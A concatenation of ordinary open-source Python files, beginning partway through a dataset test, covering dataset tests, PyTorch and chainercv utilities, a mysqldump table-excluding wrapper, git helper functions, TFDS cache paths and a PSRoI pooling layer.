expected = [six.u('NSE/OIL - column.1'),
six.u('NSE/OIL - column.2'),
six.u('SINGLE/COLUMN - column.1'),
six.u('WIKI/MSFT - column.1'),
six.u('WIKI/MSFT - column.2'),
six.u('WIKI/MSFT - column.3')]
six.assertCountEqual(self, actual, expected)
def test_get_merged_dataset_data_to_list(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('SINGLE/COLUMN', {'column_index': [1]}),
'WIKI/MSFT']).data()
results = data.to_list()
# NSE/OIL two columns of data
# SINGLE/COLUMN one column of data
# WIKI/MSFT all 3 columns of data
expected = [[datetime.datetime(2015, 7, 11, 0, 0), 444.3, 10, 444.3, 444.3, 10, 3],
[datetime.datetime(2015, 7, 13, 0, 0), 433.3, 4, 433.3, 433.3, 4, 3],
[datetime.datetime(2015, 7, 14, 0, 0), 437.5, 3, 437.5, 437.5, 3, 3],
[datetime.datetime(2015, 7, 15, 0, 0), 440.0, 2, 440.0, 440.0, 2, 3]]
for index, expected_item in enumerate(expected):
six.assertCountEqual(self, expected_item, results[index])
def test_get_merged_dataset_data_is_descending_when_specified_in_params(self):
data = MergedDataset(['NSE/OIL', 'WIKI/AAPL',
'WIKI/MSFT']).data(params={'order': 'desc'})
results = data.to_list()
dates = list([x[0] for x in results])
self.assertTrue(all(dates[i] >= dates[i + 1]
for i in range(len(dates) - 1)))
|
s3prl/utility/data.py | hhhaaahhhaa/s3prl | 856 | 12749840 | from torch.distributed.distributed_c10d import is_initialized
from torch.utils.data import Dataset, DistributedSampler
def get_ddp_sampler(dataset: Dataset, epoch: int):
"""
This function will create a DistributedSampler if DDP is initialized,
and will just return None if DDP is not initialized.
"""
if is_initialized():
sampler = DistributedSampler(dataset)
sampler.set_epoch(epoch)
else:
sampler = None
return sampler
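# Illustrative sketch (the dataset and batch size below are placeholders): the
# sampler returned above replaces DataLoader-level shuffling when DDP is
# active, so shuffle is only enabled when no sampler is returned.
def _example_build_dataloader(dataset: Dataset, epoch: int, batch_size: int = 8):
    from torch.utils.data import DataLoader
    sampler = get_ddp_sampler(dataset, epoch)
    return DataLoader(
        dataset,
        batch_size=batch_size,
        sampler=sampler,
        shuffle=(sampler is None),  # DistributedSampler already shuffles per epoch
    )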
|
core/sdfrenderer/renderer_deepsdf.py | hyunynim/DIST-Renderer | 176 | 12749850 | <filename>core/sdfrenderer/renderer_deepsdf.py
import os, sys
import torch
import numpy as np
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from renderer import SDFRenderer
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
from core.utils.decoder_utils import decode_sdf, decode_sdf_gradient, decode_color
from core.visualize.profiler import Profiler
class SDFRenderer_deepsdf(SDFRenderer):
def __init__(self, decoder, intrinsic, img_hw=None, march_step=50, buffer_size=5, ray_marching_ratio=1.5, max_sample_dist=0.2, threshold=5e-5, use_gpu=True, is_eval=True):
super(SDFRenderer_deepsdf, self).__init__(decoder, intrinsic, img_hw=img_hw, march_step=march_step, buffer_size=buffer_size, ray_marching_ratio=ray_marching_ratio, max_sample_dist=max_sample_dist, threshold=threshold, use_gpu=use_gpu, is_eval=is_eval)
def get_samples(self, latent, RT, depth, normal, clamp_dist=0.1, eta=0.01, use_rand=True):
R, T = RT[:,:3], RT[:,3]
cam_pos = self.get_camera_location(R, T)
cam_rays = self.get_camera_rays(R)
depth = depth.reshape(-1)
normal = normal.reshape(-1, 3)
valid_mask = (depth < 1e5) & (depth > 0)
valid_depth, valid_normal = depth[valid_mask], normal[valid_mask, :]
valid_zdepth = valid_depth / self.calib_map[valid_mask]
points = self.generate_point_samples(cam_pos, cam_rays[:, valid_mask], valid_zdepth, has_zdepth_grad=False)
points = points.transpose(1,0)
if use_rand:
eta_map = torch.rand_like(valid_depth) * eta
else:
eta_map = torch.ones_like(valid_depth) * eta
valid_normal_inv = self.inv_transform_points(valid_normal.transpose(1,0)).transpose(1,0)
offset = valid_normal_inv * eta_map.unsqueeze(-1)
points_pos = points + offset
samples_pos = decode_sdf(self.decoder, latent, points_pos, clamp_dist=clamp_dist).squeeze(-1)
samples_pos = samples_pos - eta_map
points_neg = points - offset
samples_neg = decode_sdf(self.decoder, latent, points_neg, clamp_dist=clamp_dist).squeeze(-1)
samples_neg = samples_neg + eta_map
return samples_pos, samples_neg
def get_freespace_samples(self, latent, RT, depth, clamp_dist=0.1, number=1):
R, T = RT[:,:3], RT[:,3]
cam_pos = self.get_camera_location(R, T)
cam_rays = self.get_camera_rays(R)
depth = depth.reshape(-1)
valid_mask = (depth < 1e5) & (depth > 0)
valid_depth = depth[valid_mask]
valid_zdepth = valid_depth / self.calib_map[valid_mask]
samples = []
for idx in range(number):
ratio_sample = torch.rand_like(valid_zdepth) * 1.0
input_zdepth = valid_zdepth * ratio_sample
points = self.generate_point_samples(cam_pos, cam_rays[:, valid_mask], input_zdepth, has_zdepth_grad=False)
points = points.transpose(1,0)
sample = decode_sdf(self.decoder, latent, points, clamp_dist=clamp_dist).squeeze(-1)
samples.append(sample)
samples = torch.cat(samples, 0)
return samples
if __name__ == '__main__':
pass
|
chainercv/chainer_experimental/datasets/sliceable/getter_dataset.py | beam2d/chainercv | 1,600 | 12749884 | <reponame>beam2d/chainercv
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset \
import _as_key_indices
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset \
import _is_iterable
from chainercv.chainer_experimental.datasets.sliceable import SliceableDataset
class GetterDataset(SliceableDataset):
"""A sliceable dataset class that is defined with getters.
This is a dataset class with getters.
Please refer to the tutorial for more detailed explanation.
Here is an example.
>>> class SliceableLabeledImageDataset(GetterDataset):
>>> def __init__(self, pairs, root='.'):
>>> super(SliceableLabeledImageDataset, self).__init__()
>>> with open(pairs) as f:
>>> self._pairs = [l.split() for l in f]
>>> self._root = root
>>>
>>> self.add_getter('img', self.get_image)
>>> self.add_getter('label', self.get_label)
>>>
>>> def __len__(self):
>>> return len(self._pairs)
>>>
>>> def get_image(self, i):
>>> path, _ = self._pairs[i]
>>> return read_image(os.path.join(self._root, path))
>>>
>>> def get_label(self, i):
>>> _, label = self._pairs[i]
>>> return np.int32(label)
>>>
>>> dataset = SliceableLabeledImageDataset('list.txt')
>>>
>>> # get a subset with label = 0, 1, 2
>>> # no images are loaded
>>> indices = [i for i, label in
... enumerate(dataset.slice[:, 'label']) if label in {0, 1, 2}]
>>> dataset_012 = dataset.slice[indices]
"""
def __init__(self):
self._keys = []
self._getters = []
self._return_tuple = True
def __len__(self):
raise NotImplementedError
@property
def keys(self):
if self._return_tuple:
return tuple(key for key, _, _ in self._keys)
else:
return self._keys[0][0]
@keys.setter
def keys(self, keys):
self._keys = [self._keys[key_index]
for key_index in _as_key_indices(keys, self.keys)]
self._return_tuple = _is_iterable(keys)
def add_getter(self, keys, getter):
"""Register a getter function
Args:
keys (string or tuple of strings): The name(s) of data
that the getter function returns.
getter (callable): A getter function that takes an index and
returns data of the corresponding example.
"""
self._getters.append(getter)
if _is_iterable(keys):
for key_index, key in enumerate(keys):
self._keys.append((key, len(self._getters) - 1, key_index))
else:
self._keys.append((keys, len(self._getters) - 1, None))
def get_example_by_keys(self, index, key_indices):
example = []
cache = {}
for key_index in key_indices:
_, getter_index, key_index = self._keys[key_index]
if getter_index not in cache:
cache[getter_index] = self._getters[getter_index](index)
if key_index is None:
example.append(cache[getter_index])
else:
example.append(cache[getter_index][key_index])
return tuple(example)
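# Note (illustrative, with a hypothetical getter): a single getter may also
# serve several keys at once when it returns a tuple, e.g.
#     self.add_getter(('img', 'label'), self.get_img_and_label)
# get_example_by_keys then caches the returned tuple and picks the element
# matching each requested key via the stored key_index.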
|
recipes/Python/286223_ohmysqldump/recipe-286223.py | tdiprima/code | 2,023 | 12749967 | <filename>recipes/Python/286223_ohmysqldump/recipe-286223.py
#!/export/home/www.netuni.nl/local/bin/python
import sys, os, getopt, getpass
import MySQLdb
def ohmysqldump(db, user, passwd, excluded, options, host=''):
conn = MySQLdb.connect(host='', db=db, user=user, passwd=passwd)
c = conn.cursor()
sql = 'show tables;'
c.execute(sql)
tables = c.fetchall()
conn.close()
arguments = [db]
for table in tables:
try:
if not table[0] in excluded:
arguments.append(table[0])
except:
print "You cannot exclude non-existing tables."
sys.exit(1)
arguments.insert(0, "mysqldump")
command = 'mysqldump'
os.execvp(command, arguments)
def usage():
print """
ohmysqldump is a wrapper for mysqldump including an option to dump a
mysql database EXCEPT the listed tables.
Usage: [OPTIONS] [database] [tables]
-E, exclude Exclude the tables
The -p and --password options in mysqldump have an optional argument. This
technique isn't supported (consider -p database table. Is 'database' a
password? Or is it the name of the database?). You can store the password in
an optionfile (~/.my.cnf) or ohmysqldump will ask for it (twice).
All (other) options in mysqldump are supported.
"""
#mysqldump --help follows:
#os.execvp("mysqldump", ["mysqldump", "--help"])
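# Example invocation (database and table names are hypothetical):
#   python ohmysqldump.py -u backup -p -E crm_db sessions cache_pages > crm_db.sql
# dumps every table of crm_db except `sessions` and `cache_pages`; -p without a
# value makes the script prompt for the password.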
def main():
shortoptions = "aAB#:?cCeEFOfh:lKntdpP:qQS:Tu:vVw:Xx"
longoptions = ["all", "debug=", "character-sets-dir=", "help", "complete-insert", \
"compress", "default-character-set=", "extended-insert", "add-drop-table", \
"add-locks", "allow-keywords", "delayed-insert", "master-data", "flush-logs", \
"force", "host=", "lock-tables", "no-autocommit", "disable-keys", \
"no-create-db", "no-create-info" "no-data", "opt", "password=", "port=", \
"quick", "quote-names", "socket=", "tab=", "user=", "verbose", "version", \
"where=", "xml", "first-slave" "fields-terminated-by=", \
"fields-enclosed-by=", "fields-optionally-enclosed-by=", \
"fields-escaped-by=", "lines-terminated-by=", "all-databases", \
"databases", "tables", "exclude"]
#Try to find additional info in the mysql option-files
f = os.popen("my_print_defaults client mysqldump")
myoptions = f.readlines()
    f.close()
for line in myoptions:
if len(line):
            # Inject it into the commandline for easy parsing by getopt
# Inject it in front so any commandline-parameters will override
# the optionfile
sys.argv.insert(1,line.replace("\n",""))
try:
opts, args = getopt.getopt(sys.argv[1:], shortoptions, longoptions)
except getopt.GetoptError:
#print "error"
# print help information and exit
usage()
sys.exit(2)
if not opts and not args:
usage()
sys.exit()
options = []
runohmy = 0
askpasswd = 0
db=""
user = ""
host=""
passwd = ""
for opt, arg in opts:
# Catch some options to handle here
if opt in ["-?", "--help"]:
usage()
elif opt in ["-E", "--exclude"]:
runohmy = 1
if len(args)>1:
db = args[0]
excluded = args[1:]
# Don' pass it along
continue
else:
usage()
sys.exit(1)
elif opt in ["-p", "--password"]:
if arg:
passwd = arg
else:
askpasswd = 1
elif opt in ["-u", "--user"]:
user = arg
elif opt in ["-h", "--host"]:
host = arg
elif opt in ["-V", "--version"]:
print "ohmysqldump v0.3"
os.execvp("mysqldump", ["mysqldump", "--version"])
if opt[2:]+"=" in longoptions:
options.append(opt+"="+arg)
elif opt[1:]+":" in shortoptions:
options.append(opt)
options.append(arg)
else:
options.append(opt+arg)
if not runohmy:
options.insert(0, "mysqldump")
command = 'mysqldump'
for arg in args:
options.append(arg)
os.execvp(command, options)
else:
if (not passwd and askpasswd):
passwd = getpass.getpass("password: ")
if not (user and (passwd and not askpasswd) and db and excluded):
usage()
sys.exit(1)
else:
ohmysqldump(db, user, passwd, excluded, options, host='')
if __name__ == "__main__":
    main()
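# Example invocation (hypothetical database and table names):
#   ohmysqldump.py -u root -p -E mydatabase cache_table session_table > dump.sql
# dumps every table of `mydatabase` except `cache_table` and `session_table`,
# prompting for the password.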
|
tbx/events/migrations/0002_auto_20210623_1428.py | elviva404/wagtail-torchbox | 103 | 12749971 | # Generated by Django 2.2.24 on 2021-06-23 13:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("events", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(name="event", options={},),
]
|
lingvo/tasks/car/waymo/waymo_ap_metric_test.py | allenwang28/lingvo | 2,611 | 12749980 | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for waymo_ap_metric."""
from lingvo import compat as tf
from lingvo.core import py_utils
from lingvo.core import test_utils
from lingvo.tasks.car.waymo import waymo_ap_metric
from lingvo.tasks.car.waymo import waymo_metadata
import numpy as np
from waymo_open_dataset import label_pb2
FLAGS = tf.flags.FLAGS
class APTest(test_utils.TestCase):
def testWaymoAPConfig(self):
metadata = waymo_metadata.WaymoMetadata()
# Use 2D metric.
config = waymo_ap_metric.BuildWaymoMetricConfig(metadata, '2d', [])
vehicle_idx = label_pb2.Label.Type.Value('TYPE_VEHICLE')
ped_idx = label_pb2.Label.Type.Value('TYPE_PEDESTRIAN')
cyc_idx = label_pb2.Label.Type.Value('TYPE_CYCLIST')
thresholds_meta = metadata.IoUThresholds()
self.assertNear(config.iou_thresholds[vehicle_idx],
thresholds_meta['Vehicle'], 1e-6)
self.assertNear(config.iou_thresholds[ped_idx],
thresholds_meta['Pedestrian'], 1e-6)
self.assertNear(config.iou_thresholds[cyc_idx], thresholds_meta['Cyclist'],
1e-6)
def testPerfectBox(self):
metadata = waymo_metadata.WaymoMetadata()
params = waymo_ap_metric.WaymoAPMetrics.Params(metadata)
m = params.Instantiate()
# Make one update with a perfect box.
update_dict = py_utils.NestedMap(
groundtruth_labels=np.array([1]),
groundtruth_bboxes=np.ones(shape=(1, 7)),
groundtruth_difficulties=np.zeros(shape=(1)),
groundtruth_num_points=None,
detection_scores=np.ones(shape=(5, 1)),
detection_boxes=np.ones(shape=(5, 1, 7)),
detection_heights_in_pixels=np.ones(shape=(5, 1)))
m.Update('1234', update_dict)
waymo_ap = m.value
self.assertAllClose(waymo_ap, 1. / 3.)
# Write a summary.
summary = m.Summary('foo')
# Check that both AP and APH are in the tags.
tags = [v.tag for v in summary.value]
self.assertIn('foo/Pedestrian/AP_LEVEL_1', tags)
self.assertIn('foo/Pedestrian/APH_LEVEL_1', tags)
self.assertIn('foo/Pedestrian/AP_LEVEL_2', tags)
self.assertIn('foo/Pedestrian/APH_LEVEL_2', tags)
def testWaymoBreakdowns(self):
metadata = waymo_metadata.WaymoMetadata()
params = waymo_ap_metric.WaymoAPMetrics.Params(metadata)
params.waymo_breakdown_metrics = ['RANGE', 'VELOCITY']
m = params.Instantiate()
# Make one update with a perfect box.
update_dict = py_utils.NestedMap(
groundtruth_labels=np.array([1]),
groundtruth_bboxes=np.ones(shape=(1, 7)),
groundtruth_difficulties=np.zeros(shape=(1)),
groundtruth_num_points=None,
groundtruth_speed=np.zeros(shape=(1, 2)),
detection_scores=np.ones(shape=(5, 1)),
detection_boxes=np.ones(shape=(5, 1, 7)),
detection_heights_in_pixels=np.ones(shape=(5, 1)))
m.Update('1234', update_dict)
# Write a summary.
summary = m.Summary('foo')
# Check that the summary value for default ap and
# a waymo breakdown version by range is the same.
for v in summary.value:
if v.tag == 'foo/Vehicle/AP_LEVEL_1':
default_val = v.simple_value
elif v.tag == 'foo/Vehicle/APH_LEVEL_1':
aph_default_val = v.simple_value
elif v.tag == 'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1':
ap_bd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2':
ap_bd_val_l2 = v.simple_value
elif v.tag == 'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1':
aph_bd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2':
aph_bd_val_l2 = v.simple_value
elif v.tag == 'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_1':
vbd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_2':
vbd_val_l2 = v.simple_value
self.assertEqual(ap_bd_val_l1, default_val)
self.assertEqual(ap_bd_val_l2, default_val)
self.assertEqual(aph_bd_val_l1, aph_default_val)
self.assertEqual(aph_bd_val_l2, aph_default_val)
self.assertEqual(vbd_val_l1, default_val)
self.assertEqual(vbd_val_l2, default_val)
# Check that eval classes not evaluated are not present.
tags = [v.tag for v in summary.value]
self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_1', tags)
self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_2', tags)
if __name__ == '__main__':
tf.test.main()
|
tests/unittesting/actions/default/cli/test_cli_worker.py | shepilov-vladislav/aiotasks | 462 | 12750062 | import click
from click.testing import CliRunner
from aiotasks.actions.cli import worker
import aiotasks.actions.cli
def _launch_aiotasks_worker_in_console(blah, **kwargs):
click.echo("ok")
def test_cli_worker_runs_show_help():
runner = CliRunner()
result = runner.invoke(worker)
assert 'Usage: worker [OPTIONS]' in result.output
def test_cli_worker_runs_ok(monkeypatch):
    # Patch the launch of: launch_aiotasks_worker_in_console
    monkeypatch.setattr(aiotasks.actions.cli, "launch_aiotasks_worker_in_console",
                        _launch_aiotasks_worker_in_console)
runner = CliRunner()
result = runner.invoke(worker, ["-A", "package"])
assert 'ok' in result.output
|
c2_python-operating-system/7_final-project/project/exercise2.py | chaiyeow/google-it-automation | 220 | 12750071 | #!/usr/bin/env python3
import operator
fruit = {"oranges": 3, "apples": 5, "bananas": 7, "pears": 2}
sorted(fruit.items())
# Output: [('apples', 5), ('bananas', 7), ('oranges', 3), ('pears', 2)]
sorted(fruit.items(), key=operator.itemgetter(0))
# Output: [('apples', 5), ('bananas', 7), ('oranges', 3), ('pears', 2)]
sorted(fruit.items(), key=operator.itemgetter(1))
# Output: [('pears', 2), ('oranges', 3), ('apples', 5), ('bananas', 7)]
sorted(fruit.items(), key = operator.itemgetter(1), reverse=True)
# Output: [('bananas', 7), ('apples', 5), ('oranges', 3), ('pears', 2)] |
gitplus/git.py | tkrajina/git-plus | 170 | 12750077 | import os.path as mod_path
import sys as mod_sys
import subprocess
from typing import *
def assert_in_git_repository() -> None:
success, lines = execute_git('status', output=False)
if not success:
print('Not a git repository!!!')
mod_sys.exit(1)
def execute_command(cmd: Union[str, List[str]], output: bool=True, prefix: str='', grep: Optional[str]=None) -> Tuple[bool, str]:
result = ''
command = cmd if type(cmd) is list else cmd.split(' ') # type: ignore
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
(cmdout, cmderr) = p.communicate()
    if cmdout is None:
        return (False, "")
for line in cmdout.decode('utf-8').split('\n'):
output_line = prefix + ('%s' % line).rstrip() + '\n'
if not grep or grep in output_line:
if output and output_line:
print(output_line.rstrip())
mod_sys.stdout.flush()
result += output_line
return (not p.returncode, result)
def execute_git(command: str, output: bool=True, prefix: str='', grep: str="") -> Tuple[bool, str]:
return execute_command('git %s' % command, output, prefix, grep)
def get_branches(remote: bool=False, all: bool=False, merged: bool=False, no_merged: bool=False) -> List[str]:
git_command = 'branch'
if remote:
git_command += ' -r'
if all:
git_command += ' -a'
if merged is True:
git_command += ' --merged'
if no_merged is True:
git_command += ' --no-merged'
success, result = execute_git(git_command, output=False)
assert success
assert result
def _filter_branch(branch: str) -> str:
if '*' in branch:
# Current branch:
return branch.replace('*', '').strip()
elif '->' in branch:
# Branch is an alias
return branch.split('->')[0].strip()
elif 'HEAD detached at' in branch:
return 'HEAD'
return branch.strip()
lines = result.strip().split('\n')
lines = list(map(_filter_branch, lines))
lines = [line for line in lines if line]
return lines
def delete_branch(branch: str, force: bool=False) -> None:
    if branch.startswith('remotes/'):
        branch = branch.replace('remotes/', '')
parts = branch.split('/')
if len(parts) >= 2:
origin_name, branch_name = parts[0], "/".join(parts[1:])
execute_git('push %s :%s' % (origin_name, branch_name))
else:
print('Don\'t know how to delete %s' % branch)
else:
execute_git('branch %s %s' % ('-D' if force else '-d', branch))
def get_config_properties() -> Dict[str, str]:
executed, output = execute_git('config -l', output=False)
if not executed:
print('Error retrieving git config properties')
mod_sys.exit(1)
result = {}
lines = output.split('\n')
for line in lines:
if '=' in line:
pos = line.find('=')
key = line[0: pos].strip().lower()
value = line[pos + 1:].strip()
result[key] = value
return result
def is_changed() -> bool:
""" Checks if current project has any noncommited changes. """
executed, changed_lines = execute_git('status --porcelain', output=False)
merge_not_finished = mod_path.exists('.git/MERGE_HEAD')
return cast(bool, changed_lines.strip() or merge_not_finished)
def get_git_sha1(branch_name: str) -> str:
success, sha1 = execute_git('log -1 %s --format=%%H --' % branch_name,
output=False)
if not success:
raise Exception(f'Invalid branch {branch_name}')
return sha1.strip()
def distance_to_commit(commit_1: str, commit_2: str) -> int:
success, log = execute_git(f'rev-list {commit_1}..{commit_2} --count', output=False)
if not success:
raise Exception(f'Error calculating distance between {commit_1}..{commit_2}')
return int(log)
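if __name__ == '__main__':
    # Small usage sketch (run inside a git repository; output is illustrative).
    assert_in_git_repository()
    print('branches:', get_branches())
    print('merged branches:', get_branches(merged=True))
    print('working tree dirty:', bool(is_changed()))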
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/twitch/urls.py | vikram0207/django-rest | 6,342 | 12750091 | from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import TwitchProvider
urlpatterns = default_urlpatterns(TwitchProvider)
|
tensorflow_datasets/core/community/cache.py | jvishnuvardhan/datasets | 3,380 | 12750093 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cache utils.
The cache (default to `~/.cache/tensorflow_datasets/`) is used for:
* The community dataset index list (cached in
`<cache_dir>/community-datasets-list.jsonl` from
`gs://tfds-data/community-datasets-list.jsonl`)
* The installed dataset packages (downloaded from github and installed in
`<cache_dir>/modules/tfds_community/`).
"""
import os
import sys
from tensorflow_datasets.core import utils
from tensorflow_datasets.core.utils import type_utils
def _default_cache_dir() -> type_utils.ReadWritePath:
"""Returns the default cache directory."""
if 'TFDS_CACHE_DIR' in os.environ:
path = os.environ['TFDS_CACHE_DIR']
elif 'XDG_CACHE_HOME' in os.environ:
path = os.path.join(os.environ['XDG_CACHE_HOME'], 'tensorflow_datasets')
else:
path = os.path.join('~', '.cache', 'tensorflow_datasets')
return utils.as_path(path).expanduser()
@utils.memoize()
def cache_path() -> type_utils.ReadWritePath:
"""Returns the path to the TFDS cache."""
path = _default_cache_dir()
path.mkdir(parents=True, exist_ok=True)
return path
@utils.memoize()
def module_path() -> type_utils.ReadWritePath:
"""Returns the path to the cached TFDS dynamically installed modules.
Calling this function will update `sys.path` so modules installed in this
directory can be imported.
Returns:
module_path: The path to the dynamically installed modules.
"""
path = cache_path() / 'modules/'
path.mkdir(parents=True, exist_ok=True)
# Add the `~/.cache/tensorflow_datasets/modules/` to `sys.path`
sys.path.append(os.fspath(path))
return path
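# Usage sketch (actual paths depend on TFDS_CACHE_DIR / XDG_CACHE_HOME, see above):
#
#     from tensorflow_datasets.core.community import cache
#     cache.cache_path()   # e.g. ~/.cache/tensorflow_datasets
#     cache.module_path()  # e.g. ~/.cache/tensorflow_datasets/modules, also appended to sys.path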
|
jarbas/core/context_processors.py | vbarceloscs/serenata-de-amor | 3,001 | 12750107 | from django.conf import settings
def google_analytics(request):
return {'google_analytics': settings.GOOGLE_ANALYTICS}
|
Easy/Chef And Apple Trees/Chef_And_Apple_Trees.py | anishsingh42/CodeChef | 127 | 12750121 | try:
t=int(input())
for i in range(t):
n=int(input())
a=list(map(int,input().split()))
set1=list(set(a))
print(len(set1))
except:
pass |
terrascript/data/oraclepaas.py | mjuenema/python-terrascript | 507 | 12750139 | # terrascript/data/oraclepaas.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:24:00 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.oraclepaas
#
# instead of
#
# >>> import terrascript.data.hashicorp.oraclepaas
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.hashicorp.oraclepaas import *
|
src/python/bezier/_curve_helpers.py | dibir-magomedsaygitov/bezier | 165 | 12750144 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for B |eacute| zier curves.
The functions provided by this module have a Cython speedup with the
exact same interface which calls out to a Fortran implementation. The speedup
will be used if the extension can be built.
"""
from bezier.hazmat import curve_helpers
try:
from bezier import _speedup
except ImportError: # pragma: NO COVER
_speedup = None
# pylint: disable=invalid-name
if _speedup is None: # pragma: NO COVER
subdivide_nodes = curve_helpers.subdivide_nodes
evaluate_multi = curve_helpers.evaluate_multi
evaluate_multi_barycentric = curve_helpers.evaluate_multi_barycentric
compute_length = curve_helpers.compute_length
elevate_nodes = curve_helpers.elevate_nodes
specialize_curve = curve_helpers.specialize_curve
evaluate_hodograph = curve_helpers.evaluate_hodograph
get_curvature = curve_helpers.get_curvature
newton_refine = curve_helpers.newton_refine
locate_point = curve_helpers.locate_point
reduce_pseudo_inverse = curve_helpers.reduce_pseudo_inverse
full_reduce = curve_helpers.full_reduce
else:
subdivide_nodes = _speedup.subdivide_nodes_curve
evaluate_multi = _speedup.evaluate_multi
evaluate_multi_barycentric = _speedup.evaluate_multi_barycentric
compute_length = _speedup.compute_length
elevate_nodes = _speedup.elevate_nodes
specialize_curve = _speedup.specialize_curve
evaluate_hodograph = _speedup.evaluate_hodograph
get_curvature = _speedup.get_curvature
newton_refine = _speedup.newton_refine_curve
locate_point = _speedup.locate_point_curve
reduce_pseudo_inverse = _speedup.reduce_pseudo_inverse
full_reduce = _speedup.full_reduce
# pylint: enable=invalid-name
|
up/extensions/python/psroi_pool.py | ModelTC/EOD | 196 | 12750168 | # Import from pod
# Import from third library
import torch
from torch.autograd import Function
from up.utils.general.log_helper import default_logger as logger
# Import from local
from .._C import psroi_pooling
class PSRoIPoolFunction(Function):
@staticmethod
def symbolic(g, features, rois, group_size, spatial_scale, output_dim):
return g.op(
"PSRoiPool",
features,
rois,
output_dim_i=output_dim,
group_size_i=group_size,
spatial_scale_f=spatial_scale)
@staticmethod
def forward(self, features, rois, group_size, spatial_scale, output_dim):
self.save_for_backward(features, rois)
self.group_size = group_size
self.spatial_scale = spatial_scale
self.output_dim = output_dim
batch_size, num_channels, data_height, data_width = features.size()
num_rois = rois.shape[0]
output = features.new(num_rois, self.output_dim, self.group_size, self.group_size).zero_()
mapping_channel = torch.IntTensor(
num_rois, self.output_dim, self.group_size, self.group_size).zero_()
forward_fn = psroi_pooling.forward_cuda
if not features.is_cuda:
            logger.warning(
                '---CPU version of PSRoIPooling is a dummy function, which is used to support tocaffe')
forward_fn = psroi_pooling.forward_cpu
else:
mapping_channel = mapping_channel.cuda()
forward_fn(
self.group_size, self.group_size, self.output_dim,
self.spatial_scale, features, rois, output, mapping_channel)
self.mapping_channel = mapping_channel
return output
@staticmethod
def backward(self, grad_output):
grad_output = grad_output.data
feature, rois = self.saved_tensors
assert grad_output.is_cuda
batch_size, num_channels, data_height, data_width = feature.shape
grad_input = grad_output.new(batch_size, num_channels, data_height, data_width).zero_()
psroi_pooling.backward_cuda(
self.group_size, self.group_size, self.output_dim,
self.spatial_scale, grad_output, rois, grad_input, self.mapping_channel)
return grad_input, None, None, None, None
class PSRoIPool(torch.nn.Module):
def __init__(self, group_size, output_dim=None, spatial_scale=None):
super(PSRoIPool, self).__init__()
self.group_size = int(group_size)
if spatial_scale is not None:
            logger.warning('`spatial_scale` is deprecated in PSRoIPool.__init__, '
                           'we move `spatial_scale` to `forward` arguments `stride` for flexibility')
if output_dim is not None:
            logger.warning('`output_dim` is deprecated in PSRoIPool.__init__, '
                           'we will calculate `output_dim` by channels of pooled '
                           '`features` and `group_size` dynamically')
def forward(self, rois, features, stride):
"""
Arguments:
rois: [N, >=5] (batch_idx, x1, y1, x2, y2)
Notes:
1. rois must be N*5 dim
2. in fp16 mode, feature.dtype is fp16, but rois.dtype may not
3. tensor must be contiguous before passing to the C code
"""
rois = rois[:, :5].contiguous().to(dtype=features.dtype)
features = features.contiguous()
assert rois.shape[1] == 5, rois.shape
spatial_scale = 1.0 / stride
output_dim = features.shape[1] // self.group_size**2
        # In ONNX context, tensor.shape is type of tensor, while symbolic of PSRoIPool requires
        # the output_dim argument to be an int
if torch.is_tensor(output_dim):
output_dim = output_dim.item()
assert self.group_size**2 * output_dim == features.shape[1]
return PSRoIPoolFunction.apply(features, rois, self.group_size, spatial_scale, output_dim)
def __repr__(self):
s = '{name} ({group_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
@classmethod
def from_params(cls, params):
group_size = params['pool_size']
return cls(group_size)
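# Minimal usage sketch (assumes the CUDA extension is built and a GPU is available;
# shapes are illustrative): feature channels must equal group_size**2 * output_dim.
#
#     pool = PSRoIPool(group_size=7)
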